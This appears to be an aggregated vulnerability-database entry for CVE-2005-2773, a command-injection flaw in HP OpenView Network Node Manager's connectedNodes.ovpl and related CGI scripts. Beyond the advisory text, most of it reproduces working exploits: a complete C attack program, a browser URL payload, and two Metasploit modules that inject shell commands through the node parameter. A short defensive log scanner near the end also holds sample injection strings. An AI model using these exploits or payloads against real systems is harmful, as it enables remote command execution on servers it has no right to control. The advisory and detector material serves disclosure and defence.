CVE-2005-2773
CVSS 7.5
Published: 2005-09-02 19:03:00
Last modified: 2016-10-17 23:30:08

[Original] HP OpenView Network Node Manager 6.2 through 7.50 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) node parameter to connectedNodes.ovpl, (2) cdpView.ovpl, (3) freeIPaddrs.ovpl, and (4) ecscmg.ovpl.


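[CNNVD] HP OpenView Network Node Manager Remote Command Execution Vulnerability (CNNVD-200509-028)

        HP OpenView Network Node Manager (OV NNM) is network management system software developed and maintained by HP, with powerful network node management capabilities.
        In HP OpenView Network Node Manager 6.2 through 7.50, OV NNM has an input validation vulnerability in its handling of user requests. Remote attackers can execute arbitrary commands via shell metacharacters in the (1) node parameter to connectedNodes.ovpl, (2) cdpView.ovpl, (3) freeIPaddrs.ovpl, and (4) ecscmg.ovpl.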

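- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)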

cpe:/a:hp:openview_network_node_manager:6.4::nt_4.x_windows_2000
cpe:/a:hp:openview_network_node_manager:6.4::solaris
cpe:/a:hp:openview_network_node_manager:6.2  HP OpenView Network Node Manager 6.2
cpe:/a:hp:openview_network_node_manager:6.4  HP OpenView Network Node Manager 6.4
cpe:/a:hp:openview_network_node_manager:6.10  HP OpenView Network Node Manager 6.10
cpe:/a:hp:openview_network_node_manager:6.31  HP OpenView Network Node Manager 6.31
cpe:/a:hp:openview_network_node_manager:6.41  HP OpenView Network Node Manager 6.41
cpe:/a:hp:openview_network_node_manager:7.0.1::windows_2000_xp
cpe:/a:hp:openview_network_node_manager:6.41::solaris
cpe:/a:hp:openview_network_node_manager:7.50  HP OpenView Network Node Manager 7.50
cpe:/a:hp:openview_network_node_manager:6.31::nt_4.x_windows_2000
cpe:/a:hp:openview_network_node_manager:6.2::nt_4.x_windows_2000
cpe:/a:hp:openview_network_node_manager:7.50::windows_2000_xp
cpe:/a:hp:openview_network_node_manager:6.2::solaris
cpe:/a:hp:openview_network_node_manager:7.50::solaris

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2773
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2773
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-028
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=112499121725662&w=2
(UNKNOWN)  BUGTRAQ  20050825 Portcullis Security Advisory 05-014 HP Openview Remote Command
http://www.securityfocus.com/advisories/9150
(UNKNOWN)  HP  SSRT051023
http://www.securityfocus.com/bid/14662
(UNKNOWN)  BID  14662
http://xforce.iss.net/xforce/xfdb/21999
(PATCH)  XF  hp-openview-node-manager-command-execution(21999)

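- Vulnerability information

HP OpenView Network Node Manager Remote Command Execution Vulnerability
High risk  Input validation
2005-09-02 00:00:00 2005-10-20 00:00:00
Remote
        HP OpenView Network Node Manager (OV NNM) is network management system software developed and maintained by HP, with powerful network node management capabilities.
        In HP OpenView Network Node Manager 6.2 through 7.50, OV NNM has an input validation vulnerability in its handling of user requests. Remote attackers can execute arbitrary commands via shell metacharacters in the (1) node parameter to connectedNodes.ovpl, (2) cdpView.ovpl, (3) freeIPaddrs.ovpl, and (4) ecscmg.ovpl.

- Advisories and patches

        No data available

- Vulnerability information (1188)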

HP OpenView Network Node Manager <= 7.50 Remote Exploit (EDBID:1188)
multiple remote
2005-08-30 Verified
0 Lympex
N/A
/*
Web Browser info:
	/OvCgi/connectedNodes.ovpl?node=a|command|
	/str0ke
*/

/*
##################################################################################
# HP OpenView Network Node Manager 6.2, 6.4, 7.01, 7.50 Remote Command Execution #
##################################################################################

Name: HP OV NNM Remote Command Execution Exploit
File: HP_OV_NNM_RCE.c
Description: Exploit
Author: Lympex
Contact:
+ Web: http://l-bytes.net
+ Mail: lympex[at]gmail[dot]com
Date: 30/08/2005
Extra: Compiled with Visual C++ 6.0

############################################################################
#SecurityTracker Alert ID:  1014791                                        #
#SecurityTracker URL:  http://securitytracker.com/id?1014791               #
#CVE Reference:  GENERIC-MAP-NOMATCH                                       #
#Updated:  Aug 25 2005                                                     #
#Original Entry Date:  Aug 25 2005                                         #
#Impact:  Execution of arbitrary code via network, User access via network #
############################################################################

*/

//headers
#include <stdio.h>//In/Out
#include <winsock2.h>//sockets functions
#include <stdlib.h>//memory functions
#include <string.h>//strlen,strcat,strcpy

#pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"

#define Port 3443 //port for connect to HP OV NNM
#define SIZE 2048 //buffer size to receive the data

/*connect host:port*/
SOCKET Conecta(char *Host, short puerto)
{
	/*struct for make the socket*/
	WSADATA wsaData;
	SOCKET Winsock;//listener socket
	/*two structures for connect*/
	struct sockaddr_in Winsock_In;
	struct hostent *Ip;

	/*start the socket*/
	WSAStartup(MAKEWORD(2,2), &wsaData);
	/*make*/
	Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

	//check socket status
	if(Winsock==INVALID_SOCKET)
	{
		/*exit*/
		WSACleanup();
		return -1;
	}

	/*complete the struct*/
	Ip=gethostbyname(Host);
	Winsock_In.sin_port=htons(puerto);
	Winsock_In.sin_family=AF_INET;
	Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));

	/*connect*/
	if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
	{
		/*end*/
		WSACleanup();
		return -1;
	}

	return Winsock;
}

/*MASTER FUNCTION*/
int main(int argc, char *argv[])
{
	/*the socket*/
	SOCKET sock;
	/*make the evil buffer to send the request*/
	char evil_request[]="GET /OvCgi/connectedNodes.ovpl?node=a| ";
	char evil_request2[]=" |";
	char *evil;
	/*to receive the data*/
	char buf[SIZE];
	unsigned int i;

	printf("\n +[ HP OV NNM Remote Command Execution ]+ by Lympex");
    printf("\nContact: lympex[at]gmail[dot]com & http://l-bytes.net");
	printf("\n-----------------------------------------------------\n");

	if(argc!=3)//HP_OV_NNM_RCE <host> <command>
	{
		printf("\n[+] Usage: %s <host> <command>",argv[0]);
		printf("\nImportant: Do not include \x22<\x22 and \x22>\x22 chars\n");
		return 0;
	}

	for(i=0;i<strlen(argv[2]);i++)
	{
		if(argv[2][i]=='<' || argv[2][i]=='>')
		{
			printf("\n[!] Error - You have included \x22<\x22 and/or \x22>\x22 chars\n");
			return 1;
		}
	}

	printf("\n[+] Connecting  %s:%d...",argv[1],Port);

	/*start the exploit*/
	sock=Conecta(argv[1],Port);//connect
	if(sock==-1)
	{
		printf("Error\n");
		return 1;
	}

	printf("OK");

	/*make the EVIL request*/
	evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));
	strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n");

	//sends it
	send(sock,evil,strlen(evil),0);

	buf[recv(sock,buf,SIZE,0)]='\0';

	//show the data
	printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);

	WSACleanup();
	LocalFree(buf);
	LocalFree(evil);
	return 0;
}

// milw0rm.com [2005-08-30]
		

- Vulnerability information (16887)

HP Openview connectedNodes.ovpl Remote Command Execution (EDBID:16887)
linux remote
2010-07-03 Verified
0 metasploit
N/A
##
# $Id: openview_connectednodes_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP Openview connectedNodes.ovpl Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
				HP OpenView connectedNodes.ovpl CGI application. The results of the command
				will be displayed to the screen.
			},
			'Author'         => [ 'Valerio Tesei <valk[at]mojodo.it>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9671 $',
			'References'     =>
				[
					['CVE', '2005-2773'],
					['OSVDB', '19057'],
					['BID', '14662'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Aug 25 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				OptString.new('URI', [true, "The full URI path to connectedNodes.ovpl", "/OvCgi/connectedNodes.ovpl"]),
			], self.class)
	end

	def exploit

		# Trigger the command execution bug
		res = send_request_cgi({
				'uri'      => datastore['URI'],
				'vars_get' =>
					{
						'node'    => %Q!; echo YYY; #{payload.encoded}; echo YYY| tr "\\n" "#{0xa3.chr}"!
					}
				}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")
			print("")

			m = res.body.match(/YYY(.*)YYY/)

			if (m)
				print_status("Command output from the server:")
				print(m[1])
			else
				print_status("This server may not be vulnerable")
			end

		else
			print_status("No response from the server")
		end
	end

end
		

- Vulnerability information (F82362)

HP Openview connectedNodes.ovpl Remote Command Execution (PacketStormID:F82362)
2009-10-30 00:00:00
Valerio Tesei  
exploit,arbitrary,cgi
CVE-2005-2773

This Metasploit module exploits an arbitrary command execution vulnerability in the HP OpenView connectedNodes.ovpl CGI application. The results of the command will be displayed to the screen.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'HP Openview connectedNodes.ovpl Remote Command Execution',
			'Description'    => %q{
				This module exploits an arbitrary command execution vulnerability in the
			HP OpenView connectedNodes.ovpl CGI application. The results of the command
			will be displayed to the screen.
			},
			'Author'         => [ 'Valerio Tesei <valk[at]mojodo.it>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-2773'],
					['OSVDB', '19057'],
					['BID', '14662'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},		
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Aug 25 2005',
			'DefaultTarget' => 0))
			
			register_options(
				[
					OptString.new('URI', [true, "The full URI path to connectedNodes.ovpl", "/OvCgi/connectedNodes.ovpl"]),
				], self.class)
	end

	def exploit
	
		# Trigger the command execution bug
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'vars_get' => 
			{
				'node'    => %Q!; echo YYY; #{payload.encoded}; echo YYY| tr "\\n" "#{0xa3.chr}"!
			}
		}, 25)		
		
		if (res)
			print_status("The server returned: #{res.code} #{res.message}")
			print("")
			
			m = res.body.match(/YYY(.*)YYY/)
			
			if (m)
				print_status("Command output from the server:")
				print(m[1])
			else
				print_status("This server may not be vulnerable")
			end
			
		else
			print_status("No response from the server")
		end
	end
	
end

    

- Vulnerability information (F42295)

openview_connectednodes_exec.pm.txt (PacketStormID:F42295)
2005-12-14 00:00:00
Valerio Tesei  
exploit,arbitrary,cgi
CVE-2005-2773

This Metasploit module exploits an arbitrary command execution vulnerability in the HP OpenView connectedNodes.ovpl CGI application. The results of the command will not be displayed to the screen.

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::openview_connectednodes_exec;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
'Name' => 'HP OpenView connectedNodes.ovpl Command Execution',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'Valerio Tesei <valk@mojodo.it>' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'DIR' => [1, 'DATA', 'Directory of connectedNodes.ovpl script', '/cgi-bin/'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits an arbitrary command execution vulnerability in the
HP OpenView connectedNodes.ovpl CGI application. The results of the command
will not be displayed to the screen.
}),

'Refs' =>
[
['OSVDB', '19057'],
['BID', '14662'],
['CVE', '2005-2773'],
],

'Payload' =>
{
'Space' => 1024,
'Keys' => ['cmd'],
},

'Keys' => ['openview'],
'DisclosureDate' => 'Aug 25 2005',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $dir = $self->GetVar('DIR');
my $cmd = $self->URLEncode( $self->GetVar('EncodedPayload')->RawPayload );

my $url = $dir.'connectedNodes.ovpl?node=%3B+'.$cmd.'+%7C+tr+%22%5Cn%22+%22%A3%22';

my $request =
"GET $dir HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: $target_host:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";

$self->PrintLine("[*] Establishing a connection to the target...");
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}


$self->PrintLine("[*] Requesting connectedNodes.ovpl...");
$s->Send($request);

$self->PrintLine("[*] Executing command...");
my $results = $s->Recv(-1, 20);
$s->Close();

return;
}

sub URLEncode {
my $self = shift;
my $data = shift;
my $res;

foreach my $c (unpack('C*', $data)) {
if (
($c >= 0x30 && $c <= 0x39) ||
($c >= 0x41 && $c <= 0x5A) ||
($c >= 0x61 && $c <= 0x7A)
) {
$res .= chr($c);
} else {
$res .= sprintf("%%%.2x", $c);
}
}
return $res;
}

1;
    

- Vulnerability information

19057
HP Openview Network Node Manager connectedNodes.ovpl node Variable Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified

- Vulnerability description

OpenView Network Node Manager contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the connectedNodes.ovpl script not properly sanitizing user input supplied to the 'node' parameter. This may allow an attacker to include a file from an arbitrary remote host that contains commands which will be executed by the vulnerable script with the same privileges as the web server.
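
A defender-side check for the flaw described above, as an added example that is not part of the original entry or of HP's code: it scans web access-log lines for requests to the four CGI scripts named in CVE-2005-2773 whose query parameters hold anything other than a plain hostname or IP address. The log lines are constructed, and the allowlist pattern and the choice to check every parameter (not only node) are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The four CGI scripts named in CVE-2005-2773 (compared case-insensitively).
SCRIPTS = {"connectednodes.ovpl", "cdpview.ovpl", "freeipaddrs.ovpl", "ecscmg.ovpl"}
# Assumption: a legitimate value is a bare hostname or IP address.
SAFE_VALUE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._:-]{0,254}")
# Request target in a common/combined-format log entry; the lazy match also
# captures raw targets that contain unencoded spaces.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.*?)(?: HTTP/\d\.\d)?"')

# Constructed log lines (documentation addresses), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Aug/2005:10:00:01 +0000] '
    '"GET /OvCgi/connectedNodes.ovpl?node=router1.example.net HTTP/1.0" 200 512',
    '192.0.2.77 - - [25/Aug/2005:10:00:09 +0000] '
    '"GET /OvCgi/connectedNodes.ovpl?node=a%7Cid%7C HTTP/1.0" 200 734',
    '192.0.2.77 - - [25/Aug/2005:10:00:12 +0000] '
    '"GET /OvCgi/connectedNodes.ovpl?node=%3B+id HTTP/1.0" 200 120',
    '192.0.2.10 - - [25/Aug/2005:10:00:20 +0000] '
    '"GET /index.html?q=a%7Cb HTTP/1.0" 200 99',
]


def suspicious_params(target):
    """Return [(name, value)] for parameters that fail the allowlist."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in SCRIPTS:
        return []
    # parse_qsl percent-decodes, so %7C, %3B and '+' are seen as | ; and space.
    params = parse_qsl(parts.query, encoding="latin-1")
    return [(k, v) for k, v in params if not SAFE_VALUE.fullmatch(v)]


def scan(lines):
    """Return [(line_number, findings)] for log lines with a bad parameter."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        found = suspicious_params(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits


if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(f"line {number}: {found}")
```

The same allowlist, applied inside the CGI before the value reaches a shell, is the input validation the description says was missing.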

- Timeline

2005-08-25 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, HP has released a patch to address this vulnerability.

- Related references

- Vulnerability author

 

 
